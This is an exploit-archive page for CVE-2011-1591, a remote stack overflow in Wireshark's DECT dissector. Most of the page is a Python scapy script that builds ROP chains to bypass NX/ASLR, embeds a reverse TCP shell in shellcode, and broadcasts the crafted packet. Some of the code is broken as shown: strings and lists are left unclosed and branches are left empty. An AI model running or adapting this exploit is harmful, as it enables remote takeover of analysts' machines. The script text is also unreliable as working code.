Suggest Exploit
Remote stack-based buffer overflow
Product Name: Wireshark
Affected Version From: Wireshark <= 1.4.4
Affected Version To: Wireshark <= 1.4.4
Patch Exists: NO
Related CWE: CVE-2011-1591
CPE: a:wireshark:wireshark:1.4.4
Other Scripts:
Platforms Tested: Archlinux

CVE-2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect()

This code exploits a remote stack-based buffer overflow in the DECT dissector of wireshark. ROP chains aim to recover dynamically stack address, mprotect it and stack pivot to shellcode located in the payload. The process is automated and bypasses any NX/ALSR.


Update to a version of Wireshark greater than 1.4.4

Exploit-DB raw data:

#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-

a = """
\n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n
# -------- Team     : Consortium-of-Pwners
# -------- Author   : ipv
# -------- Impact   : high
# -------- Target   : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
# -------- Description
# This code exploits a remote stack based buffer overflow in the DECT dissector of
# wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to 
# shellcode located the payload. 
# All the process is automated, and bypass any NX/ALSR.
# Operating Systems tested : [see the summary] with scapy >= 2.5
# For any comments, remarks, news, please mail me : ipv _at_ [team] . net

import sys, struct
if sys.version_info >= (2, 5):
   from scapy.all import *
   from scapy import *

# align
def _x(v):
    return struct.pack("<I", v)

# Gadget Table - Arch linux v2010.05 default package 
#   - wireshark-cli-1.4.3-1-i686.pkg.tar.xz  
#   - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
arch_rop_chain  = [

    # Safe SEIP overwrite
    _x(0x8069acb),                      # pop   ebx ;   pop esi ;   pop ebp
    _x(0), _x(0x80e9360), _x(0),        # fake (arg1, arg2, arg3), to avoid crash

    # mprotect 1st arg : stack & 0xffff0000
    _x(0x8067d90),                      # push esp ; pop ebp
    _x(0x8081f2e),                      # xchg ebp eax
    _x(0x80f9d7f),                      # xchg ecx, eax
    _x(0x8061804),                      # pop eax
    _x(0xffff0000),                     # 
    _x(0x80c69f0),                      # xchg edi, eax
    _x(0x80ff067),                      # and ecx edi ; dec ecx  
    _x(0x8077c53),                      # inc ecx ; sub al 0x5d 
    _x(0x8061804),                      # pop eax
    _x(0x7f16a5d0),                     # avoid crash with dec dword [ecx-0x76fbdb8c] 
    _x(0x8048360),                      # xchg ecx eax 
    _x(0x8089f46),                      # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c] 
    _x(0x8067d90),                      # push esp ; pop ebp
    _x(0x8081f2e),                      # xchg ebp eax
    _x(0x8067d92)*7,                    # ret
    # 1st arg of mprotect is on esp+48 address (see below)
    _x(0x80745f9),                      # mov [eax+0x50] edx ; pop ebp

    # we search address of mprotect (@mprotect = @fopen + 0x6fe70) 
    _x(0x8065226),                      # pop eax 
    _x(0x81aca20-0xc),                  # got[fopen]
    _x(0x8074597),                      # mov eax [eax+0xc] 
    _x(0x8048360),                      # xchg ecx eax 
    _x(0x8065226),                      # pop eax 
    _x(0x8081f2e),                      # xchg ebp eax
    _x(0x806973d),                      # add ecx ebp 
    _x(0x08104f61),                     # jmp *%ecx
    _x(0x0811eb63),                     # pop ebx, pop esi, pop edi
    # mprotect args (base_addr, page size, mode)
    _x(0),                              # Stack Map that is updated dynamically (see upper)
    _x(0x10000),                        # PAGE size 0x1000 
    _x(0x7),                            # RWX Mode
    # now we can jump to our lower addressed shellcode by decreasing esp register 
    _x(0x8061804),                      # pop eax 
    _x(0xff+0x50),                      # esp will be decreased of 0xff + 0x50 bytes;
    _x(0x80b8fc8),                      # xchg edi eax 
    _x(0x8067d90),                      # push esp ; pop ebp
    _x(0x80acc63),                      # sub ebp, edi ; dec ecx
    _x(0x8081f2e),                      # xchg ebp eax
    _x(0x0806979e)                      # jmp *eax

# Gadget Table - Bt4 compiled without SSP/FortifySource
# Source wireshark 1.4.3
labs_rop_chain = [
    # Safe SEIP overwrite
    _x(0x08073fa1),                     # pop    ebx    ;    pop    esi    ;    pop    ebp
    _x(0), _x(0x0808c4d3), _x(0),       # fake (arg1, arg2, arg3), to avoid crash
    # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode
    # mprotect 3r d arg
    _x(0x080e64cf),                     # pop edx ; pop es ; add cl cl
    _x(0x7), _x(0x0),                   # RWX mode 0x7

    # mprotect 1st arg (logical AND with stack address to get address base),
    _x(0x080a1711),                     # mov edi esp ; dec ecx 
    _x(0x0815b74f),                     # pop ecx 
    _x(0xffff0000),                     # 
    _x(0x0804c73c),                     # xchg ecx eax 
    _x(0x080fadd7),                     # and edi eax ; dec ecx
    _x(0x0804c73c),                     # xchg ecx eax 
    _x(0x080af344),                     # mov ebx edi ; dec ecx 
    # mprotect 2nd arg
    _x(0x0815b74f),                     # pop ecx
    _x(0x10000),                        # PAGE size 0x10000

    # int 0x80 : here vdso is not randomized, so, we use it!
    _x(0x80d8b71),                      # pop eax 
    _x(0x7D),                           # 0x7D = mprotect syscall
    _x(0x804e6df),                      # pop *esi
    _x(0xffffe411),                     # int 0x80 
    # _x(0xffffe414),                   # @sysenter in .vdso
    _x(0x080ab949),                     # jmp *esi
    # now we can jump to our lower addressed shellcode by decreasing esp register 
    _x(0x0815b74f),                     # pop ecx 
    _x(256),                            # esp will be decreased of 256bytes
    _x(0x080a1711),                     # mov edi esp ; dec ecx 
    _x(0x081087d3),                     # sub edi ecx ; dec ecx 
    _x(0x080f7cb1)                      # jmp *edi

addr_os = {
    # ID # OS                        # STACK SIZE      # GADGET TABLE
    1  : ["Arch Linux 2010.05    ",  0xb9,             arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
    2  : ["Labs test             ",  0xbf,             labs_rop_chain],
	-1 : ["Debian 5.0.8 Lenny    ",  -3,               False],			# wireshark_1.0.2-3+lenny12_i386.deb
    -2 : ["Debian 6.0.2 Squeeze  ",  -1,               False],			# wireshark_1.2.11-6+squeeze1_i386.deb	
    -3 : ["Fedora 14             ",  -1,               False],			# wireshark-1.4.3-1.2.2.i586.rpm
    -4 : ["OpenSuse 11.3         ",  -1,               False],			# wireshark-1.4.3-1.2.2.i586.rpm
    -5 : ["Ubuntu 10.10 | 11.04  ",  -1,               False],			# 
    -6 : ["Gentoo *              ",  -2,               False]			# 

print a

def usage():
    print "Please select and ID >= 0 :\n"
    print "   ID    TARGET                        INFO"
    print "--------------------------------------------------------------------"
    for i in addr_os.iteritems():
        print "  %2d  -- %s       "%(i[0], i[1][0]), 
        if i[1][1] == -1:
            print "Default package uses LibSSP & Fortify Source"
        elif i[1][1] == -2:
            print "Compiled/Build with Fortify Source"
        elif i[1][1] == -3:
            print "DECT protocol not supported"
            print "VULN -> Stack size %d"%(i[1][1])


if len(sys.argv) == 1:
elif addr_os.has_key(int(sys.argv[1])) is False:
elif int(sys.argv[1]) < 0:

target = addr_os[int(sys.argv[1])]
print "\n[+] Target : %s"%target[0]

rop_chain = "".join([ rop for rop in target[2]])

# msfpayload linux/x86/shell_reverse_tcp LHOST= C
rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

SEIP_SMASH = target[1]
print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)

nopsled = "\x90"
head_nop = 50
shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop)
payload = shellcode + rop_chain
# stack alignment
if (len(payload) % 2):
    diff = len(payload) % 2
    payload = payload[(2-diff):]
print "\t[+] Payload length : %d"%len(payload)

evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload
# evil_packet.show()

print "\t[+] Evil packet length : %d"%len(evil_packet)

print "\t[+] Sending packet to broadcast"